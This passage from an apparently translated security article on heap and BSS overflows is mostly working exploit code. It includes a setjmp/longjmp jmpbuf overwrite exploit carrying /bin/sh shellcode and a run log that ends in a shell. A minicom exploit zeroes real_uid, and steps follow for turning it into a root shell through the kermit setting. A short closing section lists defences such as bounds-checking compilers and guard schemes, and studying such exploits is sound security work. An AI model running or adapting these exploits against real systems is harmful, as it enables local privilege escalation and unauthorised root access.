jmp_buf jmpbuf; /* jmpbuf is what we want to overwrite */

u_long getesp()
{
   __asm__("movl %esp,%eax"); /* get the current stack pointer */
}

int main(int argc, char **argv)
{
   u_long diff;
   if (argc <= 2)
   {
      fprintf(stderr, "Usage: %s <string1> <string2>\n", argv[0]);
      exit(ERROR);
   }
   diff = (u_long)jmpbuf - (u_long)buf;
   printf("diff=%ld\n", diff);
   printf("[vulprog] argv[2] = %p\n", argv[2]);
   printf("[vulprog] sp = 0x%lx\n\n", getesp());

   if (setjmp(jmpbuf)) /* a direct call returns 0; a non-zero value means
                          longjmp() has already run and came back here, i.e.
                          the exploit failed to divert it */
   {
      fprintf(stderr, "error: exploit didn't work\n");
      exit(ERROR);
   }
   /* print the register values saved in jmpbuf before and after the overwrite */
   printf("before:\n");
   printf("bx = 0x%lx, si = 0x%lx, di = 0x%lx\n",
          jmpbuf->__jmpbuf[JB_BX], jmpbuf->__jmpbuf[JB_SI],
          jmpbuf->__jmpbuf[JB_DI]);

   printf("bp = %p, sp = %p, pc = %p\n\n",
          jmpbuf->__jmpbuf[JB_BP], jmpbuf->__jmpbuf[JB_SP],
          jmpbuf->__jmpbuf[JB_PC]);

   strncpy(buf, argv[1], strlen(argv[1])); /* this may overwrite jmpbuf */

   printf("after:\n");
   printf("bx = 0x%lx, si = 0x%lx, di = 0x%lx\n",
          jmpbuf->__jmpbuf[JB_BX], jmpbuf->__jmpbuf[JB_SI],
          jmpbuf->__jmpbuf[JB_DI]);

   printf("bp = %p, sp = %p, pc = %p\n\n",
          jmpbuf->__jmpbuf[JB_BP], jmpbuf->__jmpbuf[JB_SP],
          jmpbuf->__jmpbuf[JB_PC]);

   longjmp(jmpbuf, 1);
   return 0;
}
-----------------------------------------------------------------------------

In the above program we print the register values just to make things clearer
and easier to guess. :-)

Now the exploit. It stores the shellcode in argv[] and makes the program jump
into the argument/environment area of the stack, so an executable stack is
required.

-----------------------------------------------------------------------------

/*
 * Copyright (C) January 1999, Matt Conover & w00w00 Security Development
 *
 * This program demonstrates simulating a stack overflow on the heap by
 * overwriting a jmpbuf (setjmp/longjmp). We overwrite the sp/pc register
 * values saved in jmpbuf; when longjmp() is called it resumes execution at
 * that address, so if we can put code at that address, it will be executed.
 *
 * This takes two arguments (offsets):
 * arg 1 - stack offset (should be about 25-45).
 * arg 2 - argv offset (should be about 310-330).
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>

#define ERROR -1
#define BUFSIZE 36

#define VULPROG "./vulprog4"

char shellcode[] = /* just aleph1's old shellcode (linux x86) */
   "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0"
   "\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8"
   "\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

u_long getesp()
{
   __asm__("movl %esp,%eax"); /* the return value goes in %eax */
}

int main(int argc, char **argv)
{
   u_long stackaddr, argvaddr;
   register int index, i;

   char buf[BUFSIZE + 24 + 1];

   if (argc <= 2)
   {
      fprintf(stderr, "Usage: %s <stack offset> <argv offset>\n",
              argv[0]);

      fprintf(stderr, "[stack offset = offset to stack of vulprog]\n");
      fprintf(stderr, "[argv offset = offset to argv[2]]\n");

      exit(ERROR);
   }

   stackaddr = getesp() - atoi(argv[1]);
   argvaddr = getesp() + atoi(argv[2]);

   printf("trying address 0x%lx for argv[2]\n", argvaddr);
   printf("trying address 0x%lx for sp\n\n", stackaddr);

   /*
    * The second memset() is needed, because otherwise some values
    * will be (null) and the longjmp() won't do our shellcode.
    */

   memset(buf, 'A', BUFSIZE), memset(buf + BUFSIZE, 0x1, 12);
   buf[BUFSIZE+24] = '\0';

   /* ------------------------------------- */

   /*
    * While setting pc to the address of our shellcode we also overwrite the
    * ebp/esp saved in jmpbuf, so we rewrite them with sane values.
    */

   for (i = 0; i < sizeof(u_long); i++) /* setup BP */
   {
      index = BUFSIZE + 12 + i;
      buf[index] = (stackaddr >> (i * 8)) & 255;
   }

   /* ----------------------------- */

   for (i = 0; i < sizeof(u_long); i++) /* setup SP */
   {
      index = BUFSIZE + 16 + i;
      buf[index] = (stackaddr >> (i * 8)) & 255;
   }

   /* ----------------------------- */

   for (i = 0; i < sizeof(u_long); i++) /* setup PC */
   {
      index = BUFSIZE + 20 + i;
      buf[index] = (argvaddr >> (i * 8)) & 255;
   }

   execl(VULPROG, VULPROG, buf, shellcode, NULL);
   return 0;
}
-----------------------------------------------------------------------------
Let's look at the result of running it:
[warning3@testserver vulpkg4]$ ./exploit4 20 393
trying address 0xbffffe49 for argv[2]
trying address 0xbffffcac for sp

diff=36
[vulprog] argv[2] = 0xbffffe49
[vulprog] sp = 0xbffffcac

before:
bx = 0x401041b4, si = 0xbffffd04, di = 0x3
bp = 0xbffffcb8, sp = 0xbffffcac, pc = 0x80485c9

after:
bx = 0x1010101, si = 0x1010101, di = 0x1010101
bp = 0xbffffcac, sp = 0xbffffcac, pc = 0xbffffe49

bash$



As these examples show, overflows in the heap area can cause serious security
problems. In real environments, sensitive data on the heap can also be
overwritten. For example:

   Function                               Reason
   1.  *gets()/*printf(), *scanf()        __iob (FILE) structure stored on the heap
   2.  popen()                            __iob (FILE) structure stored on the heap
   3.  *dir() (readdir, seekdir, ...)     DIR structure (dir/heap buffers)
   4.  atexit()                           static/global function pointers
   5.  strdup()                           data dynamically allocated on the heap
   6.  getenv()                           data stored on the heap
   7.  tmpnam()                           data stored on the heap
   8.  malloc()                           chain (link) pointers
   9.  rpc callback functions             function pointers
   10. windows callback functions         function pointers saved on the heap
   11. signal handler pointers            function pointers (note: Unix tracks
                                          these in the kernel, not on the heap;
                                          in cygnus (gcc for win) they are on
                                          the heap)

The space that printf(), fgets(), readdir(), seekdir() and similar functions
allocate on the heap for FILE and DIR structures can be rewritten. The
function pointers registered with atexit() are called when the program
exits. strdup() stores strings (file names, passwords, and so on) on the
heap. malloc()'s chain pointers can be used to access memory illegally.
getenv() stores data on the heap, letting us modify variables like $HOME. The
svc/rpc registration functions (librpc, libnsl, etc.) store callback function
pointers on the heap.
Now a real-world example. minicom versions below 1.81.1 have quite a few
buffer overflows. One of them is:

            case 't': /* Terminal type */
overflow ---> strcpy(termtype, optarg);
#ifdef __linux__
            /* Bug in older libc's (< 4.5.26 I think) */
            if ((s = getenv("TERMCAP")) != NULL && *s != '/')
               unsetenv("TERMCAP");
#endif

termtype is a static array, so it lives in the BSS. Let's see whether there
is anything important in that piece of memory. In minicom.h we find:

EXTERN int real_uid;  /* real user id */
EXTERN int real_gid;  /* real group id */
EXTERN int eff_uid;   /* effective user id */
EXTERN int eff_gid;   /* effective group id */

If we can modify real_uid we may get root privileges. First let's see how far
it is from termtype; we insert one line into minicom.c:

printf ("real_uid is at: %x\n"
        "termtype is at: %x\n", &real_uid, termtype);

The output is:
real_uid is at: 80664b4
termtype is at: 8066480

Good: real_uid sits 52 bytes above termtype (0x80664b4 - 0x8066480 = 0x34 =
52), so we only need to set bytes 53 to 56 (termtype[52..55]) to zero. But the
only zero byte a C string can carry is its terminator, so we have to overflow
four times. getopt() accepts the same option repeatedly (here -t), so we first
make it read a 55-character string, which puts the terminator at termtype+55
and zeroes the last byte of real_uid. Then we overwrite with strings of 54, 53
and 52 characters in turn, and all four bytes of real_uid become zero.

----------------------------------------------------------------------------
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define OFFSET 52

/* if you figure this out, you could try defining it */
//#define UTTY "/dev/ttyp0"

char * makestring (int ch, int len)
{
   static char b[500];
   int i;

   for (i=0 ; i<len ; i++)
   {
      b[i] = ch;
   }
   b[i] = 0;
   return b;
}

int main (int argc, char **argv)
{
   char bleh[4][60];

   strcpy (bleh[0],makestring(255,OFFSET+3)); /* zeroes the byte at termtype+55 */
   strcpy (bleh[1],makestring(255,OFFSET+2)); /* zeroes the byte at termtype+54 */
   strcpy (bleh[2],makestring(255,OFFSET+1)); /* zeroes the byte at termtype+53 */
   strcpy (bleh[3],makestring(255,OFFSET));   /* zeroes the byte at termtype+52 */

#ifdef UTTY
   execl ("/usr/bin/minicom","minicom",
          "-t",bleh[0],"-t",bleh[1],
          "-t",bleh[2],"-t",bleh[3],
          "-t","vt100","-s",
          "-p",UTTY,NULL);
#else
   execl ("/usr/bin/minicom","minicom",
          "-t",bleh[0],"-t",bleh[1],
          "-t",bleh[2],"-t",bleh[3],
          "-t","vt100",
          "-s",NULL);
#endif
   return 0;
}
-------------------------------------------------------------------------------
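The four-step overwrite used against minicom, simulated on a constructed memory image so the mechanics can be checked without the real program. This is an added example, not from B4B0's exploit or the original article: `emulate_strcpy` models strcpy(termtype, optarg) on a byte array laid out as [termtype][real_uid] with the 52-byte distance measured above, and the two driver functions replay the copies in the exploit's order (longest first) and in the reverse order, to show why only the descending order leaves all four zero bytes in place.

```c
/* Added example (not from B4B0 or the original article): replay the
 * minicom -t overwrite sequence on a constructed [termtype][real_uid] image.
 * Function names and the initial uid value are chosen for this demo. */
#include <stdio.h>
#include <string.h>
#include <stdint.h>

#define OFFSET 52                         /* termtype -> real_uid, as measured above */
#define IMAGE_SIZE (OFFSET + sizeof(uint32_t))

/* Emulate strcpy(termtype, optarg) with optarg = len bytes of 0xff (the
 * exploit's makestring(255, len)): len non-zero bytes, then the NUL. 0xff is
 * used because the only zero byte a C string can deliver is its terminator. */
void emulate_strcpy(unsigned char *image, size_t len)
{
    memset(image, 0xff, len);
    image[len] = '\0';
}

/* Read the 4-byte int at OFFSET the way the program would (host order). */
uint32_t read_real_uid(const unsigned char *image)
{
    uint32_t v;
    memcpy(&v, image + OFFSET, sizeof v);
    return v;
}

/* Apply the copies lens[0..n-1] to a fresh image whose real_uid starts as
 * start_uid; return the resulting real_uid. */
uint32_t run_copies(const size_t *lens, size_t n, uint32_t start_uid)
{
    unsigned char image[IMAGE_SIZE + 1];   /* +1: room for the longest NUL */
    size_t i;
    memset(image, 0, sizeof image);
    memcpy(image + OFFSET, &start_uid, sizeof start_uid);
    for (i = 0; i < n; i++)
        emulate_strcpy(image, lens[i]);
    return read_real_uid(image);
}

/* The exploit's order: 55, 54, 53, 52 characters. Each copy is shorter than
 * the previous one, so the NUL it plants is never overwritten again. */
uint32_t descending_order(uint32_t start_uid)
{
    const size_t lens[4] = { OFFSET + 3, OFFSET + 2, OFFSET + 1, OFFSET };
    return run_copies(lens, 4, start_uid);
}

/* The wrong order: each longer copy re-fills the zero planted by the previous
 * one with 0xff, so only the final NUL (at termtype+55) survives. */
uint32_t ascending_order(uint32_t start_uid)
{
    const size_t lens[4] = { OFFSET, OFFSET + 1, OFFSET + 2, OFFSET + 3 };
    return run_copies(lens, 4, start_uid);
}

int main(void)
{
    printf("real_uid after descending copies: 0x%08x\n", descending_order(500));
    printf("real_uid after ascending copies:  0x%08x\n", ascending_order(500));
    return 0;
}
```

With the descending order the result is 0 regardless of byte order; with the ascending order three bytes stay 0xff, which on little endian x86 reads as 0x00ffffff, still not root. The same reasoning applies whenever a target value has to be set to bytes a string cannot carry: plan the copies so each one is strictly shorter than the last.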

real_uid is now 0x00000000 (root), and we can get a root shell through
minicom. After running the code above you will find that minicom's display
has turned to garbage. Start another minicom in a second terminal, look at
its menu, and choose `Filenames and paths':

A - Download directory : /tmp
B - Upload directory :
C - Script directory :
D - Script program : runscript
E - Kermit program : /usr/bin/kermit
Change which setting?

All we have to do is change /usr/bin/kermit in `E - Kermit program' to
/bin/bash and we get a root shell. Switch back to the original terminal,
change item 'E', and press CTRL-A K to start "kermit":
bash#

This is a real-world Heap/BSS overflow. Such examples are steadily increasing;
the wu-ftpd 2.5.0 mapped_path vulnerability that CERT published recently is a
new heap overflow (longjmp/setjmp) example, which interested readers can look
at themselves.
4. Possible solutions
~~~~~~~~~~~~~~~~~~~~~
Obviously the best defense against heap-based overflows is to write good
code! As with stack overflows, no single method truly prevents heap
overflows.
We can use the bounds-checking gcc/egcs developed by Richard Jones and Paul
Kelly (it should catch most potential overflows). It can be downloaded from
Richard Jones's home page:
http://www.annexia.demon.co.uk
It catches most overflows caused by human carelessness, for example:
"int array[10];
for (i = 0; i <= 10; i++) array[i] = 1".

Note:
For Windows systems, NuMega's bounds checker is available; its function is
similar to that of the bounds-checking gcc.

We can always make a non-executable heap patch (as mentioned above, most
systems have an executable heap). In an exchange with Solar Designer, he
noted that the main problem with a non-executable heap is that it can break
compilers, interpreters, and so on.

Note:

Even a non-executable heap does not solve the overflow problem. Although we
can no longer execute instructions on the heap, we can still overwrite data
that lives on the heap (as in the minicom example above).

Another possible approach is a "HeapGuard" similar to Crispin Cowan's
StackGuard. They have developed a new PointGuard to protect against function
pointer and jmpbuf overwrites, which reportedly can also be configured to
prevent illegal overwrites of variables in the stack/heap/bss. For details
see their recent paper:
"Buffer Overflows: Attacks and Defenses for the Vulnerability of the Decade"

<End>


References:

[1] "w00w00 on Heap Overflows", Matt Conover (a.k.a. Shok) & w00w00 Security
    Team
[2] "Buffer Overflows: Attacks and Defenses for the Vulnerability of the
    Decade", Crispin Cowan, Perry Wagle, Calton Pu, Steve Beattie, and
    Jonathan Walpole
[3] "a fuqn awesome minicom static buffer overflow", "ohday", B4B0, 3(9)
[4] "Smashing The Stack For Fun And Profit", Aleph One, Phrack, 7(49)
